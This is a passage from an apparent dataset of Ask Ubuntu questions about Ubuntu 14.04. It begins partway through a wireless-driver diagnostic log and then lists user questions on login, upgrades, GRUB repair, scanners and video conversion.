rate 54 mb/s , strength 50 wpa *network : infra , < mac address removed > , freq 2427 mhz , rate 54 mb/s , strength 30 wpa wpa2 vodafone-23638645 : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 14 wpa2 ipv4 settings : address : 192.168.1.1 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.254 dns : 192.168.1.254 dns : 8.8.8.8 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # wlan0 scan completed : cell 01 - address : < mac address removed > channel:4 frequency:2.427 ghz ( channel 4 ) quality=70/70 signal level=24 dbm encryption key : on essid : '' network '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=00000000f2c76e70 extra : last beacon : 64ms ago ie : unknown : 000942756c676172696e69 ie : unknown : 010802040b161224486c ie : unknown : 030104 ie : unknown : 2a0100 ie : unknown : 32040c183060 ie : wpa version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd9a0050f204104a00011010440001021041000100103b000103104700100000000000000001000300a0a244eea31021000c4d696368656c616e67656c6f10230008576176652035344310240016312e31312d445f52315f54523036395f416e6e65784d1042000a4a3935303033373731391054000800060050f204000110110014576972656c65737320526f757465722857464129100800020004 ie : unknown : dd07000c4300000000 ie : unknown : 0706495420010d10 cell 02 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=22/70 signal level=-88 dbm encryption key : on essid : '' palandri '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=00000041225feb92 extra : last beacon : 64ms ago ie : unknown : 000850616c616e647269 ie : unknown : 010882848b960c121824 ie : unknown : 03010b ie : unknown : 2a0100 ie : unknown : 32043048606c ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk # # # # # iwlist channel # # # # # wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz current frequency:2.427 ghz ( channel 4 ) # # # # # lsmod # # # # # rtl8192se 63196 0 rtl_pci 26690 1 rtl8192se rtlwifi 63475 2 rtl_pci , rtl8192se mac80211 626489 3 rtl_pci , rtlwifi , rtl8192se cfg80211 484040 2 mac80211 , rtlwifi # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192se/rtl8192se.ko firmware : rtlwifi/rtl8192sefw.bin description : realtek 8192s/8191s 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : b9b9518158623d8bab67493 alias : pci : v000010ecd00008174sv*sd*bc*sc*i* alias : pci : v000010ecd00008173sv*sd*bc*sc*i* alias : pci : v000010ecd00008172sv*sd*bc*sc*i* alias : pci : v000010ecd00008171sv*sd*bc*sc*i* alias : pci : v000010ecd00008192sv*sd*bc*sc*i* depends : rtlwifi , rtl_pci , mac80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/rtlwifi/rtl_pci.ko description : pci basic driver for rtlwifi license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : b6b8aa929b5f982954a6de1 depends : mac80211 , rtlwifi intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : c21fc2f90947540319de390 depends : mac80211 , cfg80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 # # # # # modules # # # # # lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x14e4:0x1692 ( tg3 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec:0x8174 ( rtl8192se ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 17.728391 ] rtl8192se : fw power save off ( module option ) [ 17.728439 ] rtl8192se : driver for realtek rtl8192se/rtl8191se [ 17.728439 ] loading firmware rtlwifi/rtl8192sefw.bin [ 17.832745 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 21.946944 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 21.947349 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 23.778987 ] wlan0 : authenticate with < mac address removed > [ 23.800518 ] wlan0 : no basic rates , using min rate instead [ 23.800686 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 23.802903 ] wlan0 : authenticated [ 23.803162 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 23.803167 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 23.806201 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 23.827867 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 23.831337 ] wlan0 : associated [ 23.831348 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 23.919324 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=2 ) [ 23.942512 ] wlan0 : authenticate with < mac address removed > [ 23.942523 ] wlan0 : no basic rates , using min rate instead [ 23.942789 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 23.944917 ] wlan0 : authenticated [ 23.945071 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 23.945074 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 23.946115 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 23.984809 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 23.988280 ] wlan0 : associated [ 24.041625 ] wlan0 : deauthenticated from < mac address removed > ( reason : 6 ) [ 38.107385 ] wlan0 : authenticate with < mac address removed > [ 38.118084 ] wlan0 : no basic rates , using min rate instead [ 38.118343 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 38.120460 ] wlan0 : authenticated [ 38.120612 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 38.120616 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 38.122603 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 38.145767 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 38.148813 ] wlan0 : associated [ 38.266657 ] modules linked in : ctr ccm bnep rfcomm bluetooth joydev acer_wmi sparse_keymap intel_powerclamp coretemp kvm_intel kvm psmouse serio_raw snd_hda_codec_hdmi uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev arc4 snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc snd_seq_midi rtl8192se snd_seq_midi_event rtl_pci rtlwifi snd_rawmidi mac80211 snd_seq snd_seq_device snd_timer cfg80211 lpc_ich snd mei_me mei soundcore mac_hid parport_pc ppdev lp parport ahci libahci nouveau i2c_algo_bit ttm drm_kms_helper drm tg3 mxm_wmi ptp pps_core video wmi [ 38.266775 ] [ < ffffffffa03be3ad > ] ? rtl_is_special_data+0x2d/0x110 [ rtlwifi ] [ 381.671337 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 390.067548 ] wlan0 : authenticate with < mac address removed > [ 390.280023 ] wlan0 : no basic rates , using min rate instead [ 390.280168 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 390.382948 ] wlan0 : send auth to < mac address removed > ( try 2/3 ) [ 390.486842 ] wlan0 : send auth to < mac address removed > ( try 3/3 ) [ 390.590912 ] wlan0 : authentication with < mac address removed > timed out [ 391.535969 ] wlan0 : authenticate with < mac address removed > [ 391.545892 ] wlan0 : no basic rates , using min rate instead [ 391.546125 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 391.548669 ] wlan0 : authenticated [ 391.548913 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 391.548916 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 391.550649 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 391.596789 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 391.600554 ] wlan0 : associated [ 582.097726 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 598.154410 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 631.452108 ] wlan0 : authenticate with < mac address removed > [ 631.473552 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 631.475159 ] wlan0 : authenticated [ 631.478830 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 631.481317 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 631.485031 ] wlan0 : associated [ 631.485049 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 635.515632 ] wlan0 : disassociated from < mac address removed > ( reason : 2 ) [ 635.518292 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 642.908732 ] wlan0 : authenticate with < mac address removed > [ 642.919778 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 642.921731 ] wlan0 : authenticated [ 642.923971 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 642.926351 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 642.929061 ] wlan0 : associated [ 646.956700 ] wlan0 : disassociated from < mac address removed > ( reason : 2 ) [ 646.963474 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 662.459811 ] wlan0 : authenticate with < mac address removed > [ 662.470682 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 662.472535 ] wlan0 : authenticated [ 662.479096 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 662.481604 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 662.484815 ] wlan0 : associated [ 705.101241 ] wlan0 : disassociated from < mac address removed > ( reason : 2 ) [ 705.120643 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 706.273791 ] wlan0 : authenticate with < mac address removed > [ 706.283773 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 706.392182 ] wlan0 : send auth to < mac address removed > ( try 2/3 ) [ 706.496203 ] wlan0 : send auth to < mac address removed > ( try 3/3 ) [ 706.600176 ] wlan0 : authentication with < mac address removed > timed out [ 720.336770 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 721.221957 ] wlan0 : authenticate with < mac address removed > [ 721.242533 ] wlan0 : no basic rates , using min rate instead [ 721.242677 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 721.246826 ] wlan0 : authenticated [ 721.247067 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 721.247074 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 721.248467 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 721.297096 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 721.300761 ] wlan0 : associated [ 721.300780 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 721.360052 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=2 ) [ 721.380999 ] wlan0 : authenticate with < mac address removed > [ 721.381018 ] wlan0 : no basic rates , using min rate instead [ 721.381173 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 721.383374 ] wlan0 : authenticated [ 721.383637 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 721.383645 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 721.384439 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 721.428976 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 721.432633 ] wlan0 : associated [ 721.497652 ] wlan0 : deauthenticated from < mac address removed > ( reason : 6 ) [ 737.157631 ] wlan0 : authenticate with < mac address removed > [ 737.168055 ] wlan0 : no basic rates , using min rate instead [ 737.168239 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 737.173524 ] wlan0 : authenticated [ 737.173721 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 737.173726 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 737.176502 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 737.219723 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 737.222615 ] wlan0 : associated [ 1309.995149 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 1314.127336 ] wlan0 : authenticate with < mac address removed > [ 1314.343456 ] wlan0 : no basic rates , using min rate instead [ 1314.343730 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 1314.444774 ] wlan0 : send auth to < mac address removed > ( try 2/3 ) [ 1314.548741 ] wlan0 : send auth to < mac address removed > ( try 3/3 ) [ 1314.652726 ] wlan0 : authentication with < mac address removed > timed out [ 1315.593635 ] wlan0 : authenticate with < mac address removed > [ 1315.603762 ] wlan0 : no basic rates , using min rate instead [ 1315.604027 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 1315.606867 ] wlan0 : authenticated [ 1315.607097 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 1315.607104 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 1315.608386 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 1315.646120 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 1315.649754 ] wlan0 : associated [ 1373.467843 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 1428.699247 ] wlan0 : authenticate with < mac address removed > [ 1428.709982 ] wlan0 : no basic rates , using min rate instead [ 1428.710220 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 1428.712196 ] wlan0 : authenticated [ 1428.712405 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 1428.712412 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 1428.714431 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 1428.745197 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 1428.748192 ] wlan0 : associated [ 1902.002145 ] wlan0 : deauthenticated from < mac address removed > ( reason : 3 ) [ 1903.164402 ] wlan0 : authenticate with < mac address removed > [ 1903.175085 ] wlan0 : no basic rates , using min rate instead [ 1903.175328 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 1903.177561 ] wlan0 : authenticated [ 1903.177755 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 1903.177760 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 1903.179676 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 1903.222563 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 1903.225564 ] wlan0 : associated [ 2556.853348 ] wlan0 : deauthenticated from < mac address removed > ( reason : 3 ) [ 2558.008353 ] wlan0 : authenticate with < mac address removed > [ 2558.018573 ] wlan0 : no basic rates , using min rate instead [ 2558.018897 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 2558.021228 ] wlan0 : authenticated [ 2558.021490 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 2558.021498 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 2558.023234 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 2558.044082 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 2558.046873 ] wlan0 : associated [ 2901.791297 ] wlan0 : deauthenticated from < mac address removed > ( reason : 3 ) [ 2902.941916 ] wlan0 : authenticate with < mac address removed > [ 2902.952939 ] wlan0 : no basic rates , using min rate instead [ 2902.953144 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 2902.955514 ] wlan0 : authenticated [ 2902.955881 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 2902.955888 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 2902.957341 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 2902.977797 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 2902.980958 ] wlan0 : associated [ 3245.482726 ] wlan0 : deauthenticated from < mac address removed > ( reason : 3 ) [ 3246.640940 ] wlan0 : authenticate with < mac address removed > [ 3246.651027 ] wlan0 : no basic rates , using min rate instead [ 3246.651406 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 3246.655119 ] wlan0 : authenticated [ 3246.655402 ] rtl8192se 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 3246.655411 ] rtl8192se 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 3246.655683 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 3246.670990 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 3246.673919 ] wlan0 : associated # # # # # # # # # # wireless info end # # # # # # # # # # # # thank you !
449337	how do i get lightdm to log me in when it freezes on ubuntu 14.04 ?	i 'm on ubuntu 14.04 ( somehow ) and lightdm does n't let me log in after i enter my password so i 'm using gdm . gdm works fine . what happens is the password field disappears and i ca n't click on guest account or anything except for the title bar at the top of my screen to reboot .
449339	help with 14.04	i 'm using 13.10 right now . and i 'd like to upgrade to 14.04 , but i ca n't seem to . i 've tried update manager , and even the iso , but realized i 'd need a cd for that . is there i can upgrade to 14.04 from 13.10 ? also , i 've seen elsewhere that 14.04 will have a final release on the 26th , is that true ?
449341	i ca n't start the upgrade form 13.10 to 14.04	i first ran sudo apt-get update , then tried the following commands and they all failed sudo do-release-upgrade sudo do-release-upgrade -d sudo do-release-upgrade -p each of the previous commands printed the same message : checking for a new ubuntu release no new release found i tried sudo apt-get upgrade ... nothing i tried running the update-manager from the dash multiple times ... nothing this is the output of cat /etc/apt/sources.list # deb cdrom : [ ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) ] / saucy main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy restricted main # added by software-properties # deb cdrom : [ ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) ] / saucy main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu saucy main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu saucy-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy-updates restricted multiverse main universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu saucy universe deb http : //archive.ubuntu.com/ubuntu saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu saucy multiverse deb http : //archive.ubuntu.com/ubuntu saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu saucy-security main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy-security restricted multiverse main universe # added by software-properties deb http : //archive.ubuntu.com/ubuntu saucy-security universe deb http : //archive.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb-src http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party deb http : //archive.canonical.com/ saucy partner deb-src http : //archive.canonical.com/ saucy partner # # developers who want to ship their latest software . what could i be missing ?
449343	how do i find the md5sum for 14.04 ?	every time i download a new version of ubuntu , i have trouble finding the md5sum to compare with the md5sum i generate from the new .iso file . should n't there be a link on the download site where all the md5sums are kept ?
449345	retrieving files from unbootable ubuntu drive	i tried to upgrade from 13.04 to 13.10 last night and something went wrong . at first i was able to boot to the log-in screen , but it was showing a blank screen with a cursor . i used boot-repair to attempt to fix the issue and now it only shows a blank screen . i want to format and install 14.04 , but i can not access my files through the `` try ubuntu '' option as suggested . when i try to copy the files over to another hdd or external hdd i get a permission denied message . i 've just installed ext2 on my windows 8 hdd , but it does n't allow me to view the files without formatting first .
449347	what is the ip address of my scanner ?	i 'm trying to configure and my scanner to work with sane and some pdf software i 'm trialling ... but it needs the ip address of my locally ( usb ) -connected scanner ( well , multi-function ) . what 's the command to identify this information ?
449348	why are boost package libs installed to /usr/x86_64-linux-gnu ?	after running sudo apt-get install libboost-all-dev on ubuntu 14.04 amd64 desktop ( trusty tahr ) , i found that all the libs are installed into /usr/lib/x86_64-linux-gnu/ instead of /usr/lib/ although all the headers are still installed into /usr/include/ why does this happen ?
449350	ubuntu 14.04 get windows 8 to show up	http : //paste.ubuntu.com/7271888/ so i installed ubuntu 14.04 on what used to be ubuntu 12.04 . i am dual booting with windows 8.1 . i have n't been able to access ubuntu 12.04 since windows 8.1 did some updates a few weeks back . grub shows up and i ca n't see windows 8.1 . how can i add windows 8 using boot repair ? i figured out how to install boot-repair in ubuntu 14.04 by doing this workaround : https : //bugs.launchpad.net/boot-repair/+bug/1267702 most important thing : how can i add windows 8.1 to the grub menu using boot repair ? i am not an expert by any means . thank you .
449354	14.04 - grub rescue : no such device	i have decided to retry installing ubuntu when 14.04 came out ... and i doomed my computer again . i have windows 7 installed , and i followed this guide to dual boot . after installation , i see the grub rescue screen , telling me there is no such device ( followed by a rather long set of letters an numbers ) . i am unable to boot into either windows or ubuntu . last time i had this error , i just ran boot repair and it fixed it , but this time , even that wo n't work . ( to install boot repair , i had to change the repository distribution to 'saucy ' , otherwise it does n't find the package . ) i tried boot repair twice : 1 : http : //paste.ubuntu.com/7229503/ 2 : http : //paste.ubuntu.com/7271773/ to at least save windows , what are my options ? edit : this is the bootinfo summary created by the boot repair tool : http : //paste.ubuntu.com/7272011/
449357	what is the status of irst support on ubuntu ?	last march was the ubuntu developer summit . there were an effort about enabling irst support in ubuntu . so , now that ubuntu 14.04 has been released : what is the status of this issue ? .
449358	what are my network and computer ip addresses ?	i 'm trying to configure my locally-connected ( usb ) hp deskjet f380 all-in-one to work with sane and some pdf software ( as per the instructions at https : //help.ubuntu.com/community/sane.d % 20tutorial ) ... but i need to know my network ip address and my machine ( computer ) ip address . how do i identify this information ?
449361	keybord input not work in chromium 34 ubuntu 14.04 aura ( 260972 ) [ using fcitx would avoid this issue ]	updated : replacing ibus with fcitx would be a good solution for this issue . after my test , fcitx english , chinese input methods do work in chromium 34 ubuntu 14.04 aura ( 260972 ) , and of course in lubuntu 14.04 . i just upgraded to lubuntu 14.04 from 13.10 successfully , via do-release-upgrade . but when i opened chromium , i found that i can not input any word , or use any shortcut in chromium , not only in the textbox ... but also in address bar . keyboard does not work totally right now in chromium version 34.0.1847.116 ubuntu 14.04 aura ( 260972 ) . however , keyboard works perfectly in firebox ( i ask question from it ) , in bash , etc . does anyone face the same issue , and if you have solution , please tell me . thanks .
449363	( ubuntu 14.04 ) high quality .ogv conversion to either .avi or .mp4	unfortunately , none of the solutions found on this post helped : related : video converter : ogv to avi ( or another more common format ) i have a high quality animation ( specifically , from diablo 3 ) on .ogv format and i need to be able to convert it to a more common format which can be used on video editing tools , more specifically , cinelerra which just closes on attempts to open .ogv files , returning as error : aborted ( core dumped ) my idea is to simply swap the format without losing quality . in order to do so , i used avprobe to check the video 's information in an attempt to copy it 's configurations over to my encoding . the output from avprobe is as follows : input # 0 , ogg , from 'cinematic_1_intro.ogv ' : duration : 00:02:42.79 , start : 0.000000 , bitrate : 4489 kb/s stream # 0.0 : data : skeleton stream # 0.1 : video : theora , yuv420p , 1280x544 , 14 fps , 24 tbn , 24 tbc metadata : encoder : ffmpeg2theora-0.28 stream # 0.2 : audio : vorbis , 44100 hz , 5.1 , fltp , 192 kb/s metadata : encoder : ffmpeg2theora-0.28 source_oshash : f29728676ce32de9 unsupported codec with id 0 for input stream 0 for conversion , i 'm using avconv with the following parameters : avconv -i cinematic_1_intro.ogv -c : v libx264 -acodec libmp3lame -vol 360 cinematic_1_intro.mp4 -r 14 -crf 0 -b 4489k -s 1280x544 i 've also tried swapping the framerate to 24 , same results . here is a screenshot of both videos : http : //postimg.org/image/63sxjp3tf/full/ 